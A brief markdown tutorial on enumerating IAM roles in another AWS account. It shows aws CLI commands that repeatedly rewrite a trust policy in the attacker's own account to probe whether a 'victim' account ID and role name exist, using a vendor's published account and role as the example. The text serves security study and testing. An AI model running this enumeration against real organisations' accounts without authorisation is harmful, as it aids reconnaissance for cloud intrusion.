iam-role-enumeration.md

This only works when you have the victim account ID. For this example, let's say that the victim account ID is 999988887777.

Create a test role

First, create a role that we can use for this demo. This role is in your own account.

aws iam create-role --role-name test-enumeration \
    --assume-role-policy-document '{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": {"Service": "ec2.amazonaws.com"},"Action": "sts:AssumeRole"}]}'

Test case 1: Invalid Account ID (999988887777)

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999988887777:user/invalid"},"Action": "sts:AssumeRole"}]}'

Test case 2: Valid Account ID (754728514883), Invalid role name (invalid)

Let's use New Relic's well-known account ID for this test.

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/invalid"},"Action": "sts:AssumeRole"}]}'

Test case 3: Valid Account ID (754728514883), Valid Role name (NewRelicInfrastructure-Integrations)

Let's use New Relic's well-known account ID (754728514883) and role name (NewRelicInfrastructure-Integrations) for this test.

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/NewRelicInfrastructure-Integrations"},"Action": "sts:AssumeRole"}]}'

Example

References

New Relic Account ID and role name details were found here:

• https://github.com/duo-labs/cloudmapper/blob/main/vendor_accounts.yaml#L38
• https://docs.newrelic.com/docs/integrations/amazon-integrations/get-started/connect-aws-new-relic-infrastructure-monitoring